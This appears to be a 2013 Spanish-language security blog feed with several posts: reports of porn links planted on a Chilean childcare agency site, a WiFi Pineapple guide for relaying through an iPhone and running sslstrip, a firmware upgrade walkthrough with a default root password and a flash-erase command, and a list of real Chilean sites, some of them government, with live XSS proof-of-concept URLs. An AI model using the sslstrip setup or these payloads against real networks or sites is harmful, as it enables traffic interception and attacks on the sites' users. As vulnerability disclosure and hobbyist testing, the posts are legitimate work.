<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PD: Fue detectado como sitio de phishing mientras escribia el post</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Saludos.</span></div>
shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-63506767321742453092013-11-15T03:11:00.006-08:002013-11-15T03:11:57.531-08:00[7ma Vez] Página de la JUNJI con links de Porno<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s320/looog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s320/looog.jpg" /></a></div>
<br />
De la SAGA: Hey Junji !<br />
Presentamos por 7ta vez : Junji tienes links de Pornografía!<br />
<br />
7ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.<br /><br />Robo de información? Robo de clicks?<br />
<br />
<span style="font-size: large;"><b><u>Timeline:</u></b></span><br />
<br />
Primera denuncia:(octubre-2012) <a href="http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html">http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html</a><br />
Segunda denuncia:(diciembre 2012) <a href="http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/" target="_blank"> http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/</a><br />
Tercera denuncia: ( Enero-2013)<a href="http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html" target="_blank"> http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html</a><br />
Cuarta denuncia: (abril-2013): <a href="http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html" target="_blank">http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html </a><br />
Quinta denuncia (junio-2013):<a href="http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html%C2%A0" target="_blank"> http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html </a><br />
Sexta Denuncia (Agosto-2013): <a href="http://blog.xshinee.cl/2013/08/6ta-vez-pagina-de-la-junji-con-links-de.html">http://blog.xshinee.cl/2013/08/6ta-vez-pagina-de-la-junji-con-links-de.html</a><br />
<br />
<br />
Links Actuales :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7WxFhgiGDvtx74e_sOeo5oK5uE_0QSwdYMTbiLlQBVR5Jj5HaLs-D5WjW6-dM1G5vr4H0x3N3gN1Yxtoxft-uSATv1JvFCaoJdXXze6yVQm4Ohy_ydgXK8gPeVrh7bIq3_OVdIES7rj3s/s1600/pr0n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7WxFhgiGDvtx74e_sOeo5oK5uE_0QSwdYMTbiLlQBVR5Jj5HaLs-D5WjW6-dM1G5vr4H0x3N3gN1Yxtoxft-uSATv1JvFCaoJdXXze6yVQm4Ohy_ydgXK8gPeVrh7bIq3_OVdIES7rj3s/s640/pr0n.png" width="640" /></a></div>
<br />shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-50894796455130956302013-10-27T16:39:00.001-07:002013-10-27T17:19:57.608-07:00Wifi Pineapple : WiFi Relay + iPhone <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwv-M7dySIm7KnqA_t2tTN2ty2PmXoOlmIrWKtTnXwwgW5rSQsOJfvMQzs85eFjtIK0K_E67b8aU8GxLlNQQSEPHdq-4LUe0_oCB7x9FV8PB4dUb1-dfQnIEAXYNS-yuY_U7qP3kNz8MgG/s1600/pineapple_custom_solution_medium.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwv-M7dySIm7KnqA_t2tTN2ty2PmXoOlmIrWKtTnXwwgW5rSQsOJfvMQzs85eFjtIK0K_E67b8aU8GxLlNQQSEPHdq-4LUe0_oCB7x9FV8PB4dUb1-dfQnIEAXYNS-yuY_U7qP3kNz8MgG/s1600/pineapple_custom_solution_medium.png" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;"></span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></div>
<span style="font-family: Courier New, Courier, monospace;">
</span>
<br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></div>
<span style="font-family: Courier New, Courier, monospace;">
La piña WiFi te ofrece distintas formas de proveerle internet: ya sea por BAM, Ethernet con el PC, Android Usb Tethering, etc. En fin la situación era que soy dueño de un Iphone [Si, me gustan] y tengo mi plan ilimitado de Internet por lo que no quería pagar una BAM solo para la Piña y la idea no era andar con el PC en todas partes. Busqué por un montón de sitios opciones que me permitieran conectar la piña al Iphone por usb y realizar un tethering pero no era soportado debido a ciertos paquetes ausentes.</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Entonces hay que aprovechar lo que tenemos:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PiñaWifi | WifiPineaple MK4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Iphone 4 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Adaptador USB wifi | Crolatus </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Un Hub Ordinario xD</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Memoria Usb [Para las Infusiones]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Conectamos mediante el Hub, el usb con nuestras infusiones y el Adaptador USB WiFi Crolatus y verificamos que lo reconozca mediante la pestaña usb accediendo por el navegador </span><span style="font-family: 'Courier New', Courier, monospace;">http://172.16.42.1:1471</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT5p1zQTgUBZiICtT1wFN5lFda4vuVz4Klr_WsAVKnzrKtCKTBn_wfeXddRynzdqRd6MwEdaqHvMWFCHP7L23v-R3E1AvGItheLGLEVId74Yh3mIPIDa_SZHExRwPtKEQwPF-cXXc1jjWp/s1600/pina001.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT5p1zQTgUBZiICtT1wFN5lFda4vuVz4Klr_WsAVKnzrKtCKTBn_wfeXddRynzdqRd6MwEdaqHvMWFCHP7L23v-R3E1AvGItheLGLEVId74Yh3mIPIDa_SZHExRwPtKEQwPF-cXXc1jjWp/s1600/pina001.png" height="145" width="640" /></a></div>
<span style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">La idea es alimentar a la Piña mediante compartir Internet inalambrico desde el iPhone y hacer correr sslstrip | Todo esto si mediar la necesidad de un computador.</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Archivos de Conexión:</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Nuestro connect1.sh</span></div>
<pre class="brush: plain">#!/bin/sh
ifconfig wlan1 up
# Conexión a WPA2 usando wpa_supplicant
wpa_supplicant -i wlan1 -c clave1 -B
# "clave1" será un archivo creado por nosotros
#wlan1 es nuestro Adaptador Crolatus
#ipforwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
#Reset de iptables and config
iptables -F
iptables -X
iptables -A FORWARD -o wlan1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT
iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
#un sleep de 6 segundos para que este lista la asociación..
sleep 6
# DHCP de OpenWrt
udhcpc -i wlan1
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Ahora seguiremos con el archivo "clave1" mencionado en el script anterior que se trata en de nuestro wpa_passphrase, abrimos una consola y escribimos:</span><br />
<br />
<br />
<pre class="brush: plain">wpa_passphrase tu_SSID tu_clave
#En mi caso wpa_passphrase "iPhone de Shine" "00000000" > clave1
#Si vamos al archivo veremos algo asi
# network={
# ssid="iPhone de Shine"
# #psk="00000000"
# psk=0d6f2eaab4ddeef7e6a6bbb0118774b279fa81ad0839e92a888ad528a95106e7
#}
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Subiremos los archivos "connect1.sh" y "clave1" a la piña por ssh al directorio /pineapple/config/ </span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Entraremos a la piña por el navegador http://172.16.42.1:1471 y entraremos a la configuración para setear el uso del boton WPS para que ejecute el script cuando presiones dicho boton entre 2-4 segundos.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPh-4mHFBqf-zXEQnI7FWwMN5ZO3EQnT8nu5Wnfn1-k-Fr_9AciQzmjsQwyEKlN5ugXLfDqgiR2LAYcUIa4GDYUQAR-kf-LKQC-gmShyfwvUI-UW1s-_n8TymAe9MW5J_bhsT8-Jk59Od/s1600/pina.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPh-4mHFBqf-zXEQnI7FWwMN5ZO3EQnT8nu5Wnfn1-k-Fr_9AciQzmjsQwyEKlN5ugXLfDqgiR2LAYcUIa4GDYUQAR-kf-LKQC-gmShyfwvUI-UW1s-_n8TymAe9MW5J_bhsT8-Jk59Od/s1600/pina.png" height="384" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Ahora solo nos quedaría configurar el sslstrip para que se ejecute desde un comienzo al encender la Piña, existen otras formas de lanzarlo solo use su imaginación.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOBERze6BMhJme8cxBGCH9FGxWqWz_X12-4wzLwBWhLJA1CGtap9x84QgZdFdVYEeKWawBNAnVtvQrBLC3J787WYTXHripCvB5ndXk0ignwPE3Pw3dEWISWtwQzV2IA14YV515qVGMjLZ/s1600/pine003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOBERze6BMhJme8cxBGCH9FGxWqWz_X12-4wzLwBWhLJA1CGtap9x84QgZdFdVYEeKWawBNAnVtvQrBLC3J787WYTXHripCvB5ndXk0ignwPE3Pw3dEWISWtwQzV2IA14YV515qVGMjLZ/s1600/pine003.png" height="92" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace;">Listo, ya tenemos nuestra Piña lista para usada con el Internet del Iphone y lanzar el script con el boton WPS..</span></div>
<br />shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-4015050708950277872013-10-19T15:38:00.003-07:002013-10-27T17:23:06.853-07:00Upgradeando la Piña WiFi MK4 y no morir en el Intento<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5Qsw-_I4QCj3OEGktK9WBqFyITNH2bJVwaQ3hKvQmwDncD3L06nAkj4v3BrKbkt7URGXyYoqf-Pg9HQyzmi_biWgUjLt1bqlZEnkDdn_o_qhkqhoPFCTCl_dM8opwR7DiPytWJdP-hK8/s1600/red_preferida.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5Qsw-_I4QCj3OEGktK9WBqFyITNH2bJVwaQ3hKvQmwDncD3L06nAkj4v3BrKbkt7URGXyYoqf-Pg9HQyzmi_biWgUjLt1bqlZEnkDdn_o_qhkqhoPFCTCl_dM8opwR7DiPytWJdP-hK8/s1600/red_preferida.jpg" height="187" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Estos días que ando con un "poco" más de tiempo, quise upgradear el firmware de la Piña y me di cuenta que mediante la plataforma el navegador arrojaba distintos problemas.</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGy1uK0XHeoVGyLBIlAKtK_Ya-MDXGcu6Tkl-vIbF7a6KfI8V2IRvF7YOzBwRLDKpxYm3IBF51U4b7BkrocguDexqU9HpnNdW-YqrGcX1Em4mNP9oQv4utGv4Xj8kPfqW4Au8LOewQ4bw/s1600/pine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLGy1uK0XHeoVGyLBIlAKtK_Ya-MDXGcu6Tkl-vIbF7a6KfI8V2IRvF7YOzBwRLDKpxYm3IBF51U4b7BkrocguDexqU9HpnNdW-YqrGcX1Em4mNP9oQv4utGv4Xj8kPfqW4Au8LOewQ4bw/s1600/pine.png" /></a></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /><br /><br />1) Decía descargar la versión 2.8.1 y realmente descargaba la 3.0.0 por lo que el MD5 no coincidía con el que te ofrece para comparar.</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">2) Al intentar usar el MD5 disponible directo del <a href="https://wifipineapple.com/?downloads&version=mk4" target="_blank">sitio</a> (MK4)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">arrojaba un error "Error, please check the file you specified. Error 7"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Buscando soluciones por las webs oficiales, di con la solución al Upgrade [ Sí, bendito ssh ]:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Nos conectamos a la piña por ssh:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<br /></div>
</div>
<pre class="brush: Perl">ssh root@172.16.42.1
Password: pineapplesareyummy
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Una vez dentro primero tendremos que generar un poco de espacio, ya que sino no podremos subir el firmware por scp a la piña</span><span style="color: #282828;"><span style="font-family: helvetica, arial, sans-serif; font-size: 14.44444465637207px; line-height: 21.94444465637207px;">.</span><span style="font-size: 14.44444465637207px; line-height: 21.94444465637207px;"><span style="font-family: Courier New, Courier, monospace;"> Entonces ejecutamos:</span></span></span><br />
<span style="color: #282828;"><span style="font-size: 14.44444465637207px; line-height: 21.94444465637207px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></span>
<span style="color: #282828;"><span style="font-size: 14.44444465637207px; line-height: 21.94444465637207px;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl">mtd -r erase rootfs_data
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Luego de esto subimos por scp el fichero de Upgrade que descargamos desde la <a href="https://wifipineapple.com/?downloads&version=mk4" target="_blank">pagina oficial</a> al directorio /tmp de la piña. así:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl">scp upgrade-2.8.1.bin root@172.16.42.1:/tmp/
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Una vez dentro nuevamente de la piña por ssh, vamos a verificar el md5 del archivo haciendo un:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl">md5sum /tmp/upgrade-2.8.1.bin
</pre>
<br />
<span style="font-family: Courier New, Courier, monospace;">Si correspondiera a la correcta, en este caso a: 17e4384a79e7fef9c267f7da34ed4743 Seguimos con el siguiente comando:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<pre class="brush: Perl">sysupgrade -n /tmp/upgrade-2.8.1.bin
</pre>
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">Ahora solo queda hacer un reboot y listo !</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLb1VUbvzfBzzBd1SrOxG4OzPV2a1tgjFjq0k-y0Ne62A9tVniwp-4USKGe8fooxV4hoyWwBGUq5VAw-A-_Fw0mveLnBxh7BsLE_E0sR8Rm44n1WHa-G157L6nrrpHEqg-uktZeoxSVwD/s1600/pine2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLb1VUbvzfBzzBd1SrOxG4OzPV2a1tgjFjq0k-y0Ne62A9tVniwp-4USKGe8fooxV4hoyWwBGUq5VAw-A-_Fw0mveLnBxh7BsLE_E0sR8Rm44n1WHa-G157L6nrrpHEqg-uktZeoxSVwD/s1600/pine2.png" height="132" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Ahora a seguir instalando Infusions..</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">G0!</span>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com0tag:blogger.com,1999:blog-7067370504470948159.post-83491048907201787792013-09-07T19:42:00.003-07:002013-09-07T21:11:19.296-07:00[XSF-XSS] Cross Site Flashing - Sitios Chilenos<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;">Buscando sitios chilenos que tuvieran presente JW Player y revisando si la versión era vulnerable, o habia sido actualizada o fixeada para Cross site Flashing | XSS , gracias a un pequeño script en perl y a Google di con unos sitios los cuales se ven afectados por esta vulnerabilidad.</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span>
<span style="font-family: Courier New, Courier, monospace;"><b>Lista de sitios Chilenos Afectados</b>:</span><br>
<span style="font-family: Courier New, Courier, monospace;"><br></span><span style="font-family: Courier New, Courier, monospace;"><b>TOP 8 || GOB y sitios conocidos</b></span>
<br>
<pre class="brush: plain">http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29
http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29
http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
</pre><a href="http://xshinee.blogspot.com/2013/09/xsf-xss-cross-site-flashing-sitios.html#more">Seguir Leyendo >></a>shinee_http://www.blogger.com/profile/02229332653724461891noreply@blogger.com2tag:blogger.com,1999:blog-7067370504470948159.post-75752366537484277482013-08-20T07:11:00.000-07:002013-08-20T07:11:55.399-07:00[6ta vez] Página de la JUNJI con links de Porno<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s500/looog.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirpGN32FSeLQ3qzcuwn5lCkLSl1-GAQM0OcrHhIrksj7v8MzpzAJjKDyzGCrvonQVOeda-XNj6fU3kTS74T5Hi0CMxRKDfH-N9U4Wt8q2O3rsAMdSCCoXFQjrbfcHNzD7BuBSJhFuVA_zA/s320/looog.jpg" width="320" /></a></div>
<span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><br /></span>
<span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><br /></span>
<span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;">De la SAGA: Hey Junji !<br />Presentamos por 5ta vez : Junji tienes links de Pornografía!<br /><br />Dejándose de bromas, es 5ta vez que informo de presencia de links de pornografia en el sitio de la JUNJI CHILE, es procupante que esto se este repitiendo una y otra vez debido a que las soluciones que se están ejecutando son solo temporales borrando los links y no corrigiendo el origen del problema.<br /><br />Timeline:</span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><br /></span><span style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;"></span><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><b>Primera denuncia:(octubre-2012)</b> <a href="http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html" style="color: #444444; text-decoration: none;">http://blog.xshinee.cl/2012/10/sitio-web-de-la-junji-con-enlaces-porno.html</a></span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;"><b>Segunda denuncia:(diciembre 2012)</b> <a href="http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/" style="color: #444444; text-decoration: none;">http://blog.secureless.org/noticias/chile-sitio-web-de-la-junji-elnazando-a-sitio-web-xxx/</a></span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;">Tercera denuncia: ( Enero-2013) <a href="http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html" style="color: #444444; text-decoration: none;">http://blog.xshinee.cl/2013/01/nuevamente-links-de-pornografia-en.html</a></span><br style="background-color: black; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px;" /><span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;">Cuarta denuncia: (abril-2013): <a href="http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html" style="color: #444444; text-decoration: none;">http://blog.xshinee.cl/2013/04/4ta-vez-pagina-de-la-junji-con-links.html</a> </span><br />
<span style="background-color: black; color: white; font-family: 'Courier New', Courier, monospace; font-size: 13px; line-height: 18px;">Quinta denuncia (junio-2013):</span><b><span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> </span><a href="http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html">http://blog.xshinee.cl/2013/06/5ta-vez-pagina-de-la-junji-con-links-de.html</a> </b><br />
<b><br /></b>
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
